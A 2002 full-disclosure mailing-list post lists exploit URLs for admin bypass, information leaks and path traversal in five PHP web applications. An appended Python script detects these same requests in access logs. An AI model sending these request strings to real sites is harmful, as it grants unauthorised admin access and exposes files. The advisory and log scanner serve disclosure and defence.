Security holes : Rose, EasyNews, User Online, Mon Album, KorWebLog

From: frog frog (leseulfrogat_private)
Date: Thu Jun 06 2002 - 08:14:02 PDT

    Hello people :)
    
    Product 1 :
    ***********
    Rose
    http://www.jinxm.co.uk
    
    Version :
    4.52 
    
    Problem :
    - Admin access
    
    Exploit :
    - newsadmin/upload.php?userinfo[username]=hop&userinfo[userlevel]=100
    
    Product 2 :
    ***********
    EasyNews
    http://www.webrc.ca
    
    Version :
    4.3
    
    Problem :
    - Admin access
    
    Exploits :
    - admin.php?en_log_id=0&action=users
    - admin.php?en_log_id=0&action=config
    
    Product 3 :
    ***********
    User Online
    http://www.elpar.net
    
    Version :
    2.0
    
    Problem :
    - Information recovery
    
    Exploit :
    - /ip.txt
    
    Product 4 :
    ***********
    Mon Album
    http://www.3dsrc.com
    
    Version :
    0.6.2d
    
    Problems :
    - Information recovery
    - Admin access
    
    Exploits :
    - admin/admin_phpinfo.php4
    - admin.php4?reg_login=1
    
    Product 5 :
    ***********
    KorWebLog
    http://weblog.kldp.org/
    http://eunjea.sourceforge.net/
    
    Version :
    1.5.8
    
    Problems :
    - Path disclosure
    - HD's files listing
    
    Exploits :
    - viewimg.php?path=viewimg.php&form=1&var=1
    - viewimg.php?path=../../../path/to/list&form=1&var=1
    
    
    
    
    More details in French :
    http://www.ifrance.com/kitetoua/tuto/5holes7.txt
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2F5holes7.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
    
    
    frog-m@n
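
For anyone running one of these packages, the request patterns listed in the post can be searched for in web server access logs; the script below is an added example, not part of the original post or of any of the products. It assumes Common Log Format; the site paths, client addresses, and the premise that normal use never carries these parameters in the URL are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a Common Log Format entry: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the advisory item a request target matches, or None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qs percent-decodes names, so userinfo%5Buserlevel%5D is seen too
    params = parse_qs(parts.query, keep_blank_values=True)
    if path.endswith("newsadmin/upload.php") and any(
            name.startswith("userinfo[") for name in params):
        return "Rose: userinfo[] set from the URL"
    if path.endswith("/admin.php") and "en_log_id" in params:
        return "EasyNews: en_log_id set from the URL"
    if path.endswith("/ip.txt"):
        return "User Online: ip.txt requested"
    if path.endswith("admin/admin_phpinfo.php4"):
        return "Mon Album: admin_phpinfo.php4 requested"
    if path.endswith("/admin.php4") and "reg_login" in params:
        return "Mon Album: reg_login set from the URL"
    if path.endswith("/viewimg.php") and any(
            ".." in v or v.lower().endswith(".php") for v in params.get("path", [])):
        return "KorWebLog: viewimg.php path is a script or contains '..'"
    return None

def scan(lines):
    """Return (client, target, finding) for each log line that matches."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        finding = classify(m.group(1)) if m else None
        if finding:
            hits.append((line.split(" ", 1)[0], m.group(1), finding))
    return hits

# Constructed sample lines (documentation addresses, hypothetical site paths)
SAMPLE = [
    '192.0.2.10 - - [06/Jun/2002:09:01:00 -0700] "GET /news/newsadmin/upload.php?userinfo%5Busername%5D=hop&userinfo%5Buserlevel%5D=100 HTTP/1.0" 200 512',
    '192.0.2.10 - - [06/Jun/2002:09:01:05 -0700] "GET /weblog/viewimg.php?path=../../../path/to/list&form=1&var=1 HTTP/1.0" 200 900',
    '198.51.100.7 - - [06/Jun/2002:09:02:00 -0700] "GET /weblog/viewimg.php?path=images/cat.jpg&form=1&var=1 HTTP/1.0" 200 4096',
    '198.51.100.7 - - [06/Jun/2002:09:02:10 -0700] "GET /stats/ip.txt HTTP/1.0" 200 128',
]

if __name__ == "__main__":
    for client, target, finding in scan(SAMPLE):
        print(client, finding, target)
```

Access logs record only the URL, so the same parameters sent in a POST body will not appear here.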
    


